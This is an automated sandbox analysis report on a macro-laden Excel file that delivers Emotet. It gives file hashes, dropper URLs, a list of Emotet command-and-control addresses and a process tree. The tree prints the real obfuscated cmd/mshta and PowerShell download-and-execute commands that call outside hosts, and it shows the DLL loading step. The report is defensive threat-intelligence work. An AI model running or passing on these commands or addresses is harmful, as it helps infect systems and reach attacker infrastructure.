Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 10:55

General

  • Target

    aca67468ced86d88c980d851092607e06405b3109230404fb7c51c6c916f389b.xlsm

  • Size

    114KB

  • MD5

    4962c644e09bb0011788f7b2fe368e40

  • SHA1

    13465cd4f8d94af607145cb65eb901a71a33437d

  • SHA256

    aca67468ced86d88c980d851092607e06405b3109230404fb7c51c6c916f389b

  • SHA512

    320c40058c983b6b9be51635f467779a7445c40ce69c3be890f27e61d2364912fc8ecd46224703ad9165b83607df5ad8e4e488da0346e57d9d85213cb0e78541

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/sec.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aca67468ced86d88c980d851092607e06405b3109230404fb7c51c6c916f389b.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3156
      • C:\Windows\system32\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3216
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1852
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xfdbikl\zqczknjgcrpab.nhk",DHinMMntFhr
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1084
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xfdbikl\zqczknjgcrpab.nhk",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1312
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3168 -s 1664
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:644

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll

    MD5

    0c861bac69f09cf80d8e2cd928236a86

    SHA1

    46cf07b6bfce7c6f4f04f8033bfd320a3ecc8f83

    SHA256

    d0b1c6960288a6f9efee0ed52a34ad70296d8f48e54d4e0368b7f4022fc8abb4

    SHA512

    615caeb22b82a6262aecece95f51e84b5494215e8d5fc7726db47d9e17a6c1a5380ecabc7601d0020744d42bfa650b11e49cd943182c247d6acb70ffa8683227

  • \Users\Public\Documents\ssd.dll

    MD5

    0c861bac69f09cf80d8e2cd928236a86

    SHA1

    46cf07b6bfce7c6f4f04f8033bfd320a3ecc8f83

    SHA256

    d0b1c6960288a6f9efee0ed52a34ad70296d8f48e54d4e0368b7f4022fc8abb4

    SHA512

    615caeb22b82a6262aecece95f51e84b5494215e8d5fc7726db47d9e17a6c1a5380ecabc7601d0020744d42bfa650b11e49cd943182c247d6acb70ffa8683227

  • \Users\Public\Documents\ssd.dll

    MD5

    0c861bac69f09cf80d8e2cd928236a86

    SHA1

    46cf07b6bfce7c6f4f04f8033bfd320a3ecc8f83

    SHA256

    d0b1c6960288a6f9efee0ed52a34ad70296d8f48e54d4e0368b7f4022fc8abb4

    SHA512

    615caeb22b82a6262aecece95f51e84b5494215e8d5fc7726db47d9e17a6c1a5380ecabc7601d0020744d42bfa650b11e49cd943182c247d6acb70ffa8683227

  • memory/1084-604-0x0000000004D70000-0x0000000004D98000-memory.dmp

    Filesize

    160KB

  • memory/1312-605-0x0000000004E00000-0x0000000004E28000-memory.dmp

    Filesize

    160KB

  • memory/1944-602-0x0000000005190000-0x00000000051B8000-memory.dmp

    Filesize

    160KB

  • memory/1944-600-0x0000000005030000-0x0000000005058000-memory.dmp

    Filesize

    160KB

  • memory/1944-598-0x0000000004FD0000-0x0000000004FF8000-memory.dmp

    Filesize

    160KB

  • memory/1944-594-0x0000000004CF0000-0x0000000004D18000-memory.dmp

    Filesize

    160KB

  • memory/1944-592-0x0000000004950000-0x0000000004978000-memory.dmp

    Filesize

    160KB

  • memory/2224-588-0x00000000035E0000-0x0000000003608000-memory.dmp

    Filesize

    160KB

  • memory/2728-129-0x00007FFF03D00000-0x00007FFF03D10000-memory.dmp

    Filesize

    64KB

  • memory/2728-115-0x00007FFF06850000-0x00007FFF06860000-memory.dmp

    Filesize

    64KB

  • memory/2728-128-0x00007FFF03D00000-0x00007FFF03D10000-memory.dmp

    Filesize

    64KB

  • memory/2728-121-0x00007FFF06850000-0x00007FFF06860000-memory.dmp

    Filesize

    64KB

  • memory/2728-118-0x00007FFF06850000-0x00007FFF06860000-memory.dmp

    Filesize

    64KB

  • memory/2728-117-0x00007FFF06850000-0x00007FFF06860000-memory.dmp

    Filesize

    64KB

  • memory/2728-116-0x00007FFF06850000-0x00007FFF06860000-memory.dmp

    Filesize

    64KB

  • memory/3216-355-0x0000013929396000-0x0000013929398000-memory.dmp

    Filesize

    8KB

  • memory/3216-315-0x00000139439D0000-0x0000013943A46000-memory.dmp

    Filesize

    472KB

  • memory/3216-291-0x00000139434D0000-0x000001394350C000-memory.dmp

    Filesize

    240KB

  • memory/3216-290-0x0000013929393000-0x0000013929395000-memory.dmp

    Filesize

    8KB

  • memory/3216-289-0x0000013929390000-0x0000013929392000-memory.dmp

    Filesize

    8KB

  • memory/3216-270-0x0000013943360000-0x0000013943382000-memory.dmp

    Filesize

    136KB